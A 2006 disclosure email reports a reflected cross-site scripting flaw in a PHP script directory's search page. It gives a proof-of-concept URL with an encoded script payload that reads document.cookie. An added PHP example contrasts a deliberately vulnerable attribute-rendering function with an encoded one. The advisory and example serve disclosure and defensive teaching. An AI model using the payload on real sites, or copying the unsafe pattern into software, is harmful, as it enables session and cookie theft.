From: predej deja
To: cert@cert.org, osvdb, secunia, securityfocus
Date: Tue, 28 Mar 2006 18:21:43 +0200
Subject: [OSVDB Mods] PHP Script Index - Cross Site Scripting

PHP Script Index - Cross Site Scripting

Vendor URL: http://www.nukedweb.com/phpscripts/

Description:
The search app does not properly validate user input, which allows people to inject dangerous HTML code.

PoC:
http://www.phpmaniacs.com/scripts/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Go%21

Preddy
RootShell Security Group
www.rootshell-security.net
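
The PoC value begins with `">`, which suggests the search term is reflected inside a double-quoted HTML attribute; the PHP below is an added example, not the vendor's code and not part of the original post, that sets that pattern beside an output-encoded one. Only the `search` parameter name comes from the PoC URL; the markup, the function names and the 100-character cap are assumptions, and the mbstring extension is assumed to be loaded.

```php
<?php
// Added example, not the vendor's code. Only the "search" parameter name is
// taken from the PoC URL; markup and function names are assumptions.

// Vulnerable pattern: raw input concatenated into a double-quoted attribute.
function render_search_box_unsafe(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">';
}

// Input handling: accept only a bounded, valid UTF-8 string.
function clean_search_term($raw): string
{
    if (!is_string($raw) || !mb_check_encoding($raw, 'UTF-8')) {
        return '';                         // arrays (search[]=x) or broken encoding
    }
    $raw = preg_replace('/[\x00-\x1F\x7F]/u', '', $raw) ?? '';  // drop control chars
    return mb_substr(trim($raw), 0, 100, 'UTF-8');              // cap the length
}

// Output encoding for HTML text and quoted-attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_box_safe(string $search): string
{
    return '<input type="text" name="search" value="' . h($search) . '">';
}

// Decoded value of the "search" parameter from the PoC in the advisory.
$poc = urldecode('%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E');

// In the application this would be clean_search_term($_GET['search'] ?? '').
$term = clean_search_term($poc);

echo render_search_box_unsafe($poc), PHP_EOL;  // quote closes the attribute early
echo render_search_box_safe($term), PHP_EOL;   // quote and brackets become entities
```

`clean_search_term()` leaves quotes and angle brackets in place, so the encoding in `h()` at output time is what keeps the value inside the attribute.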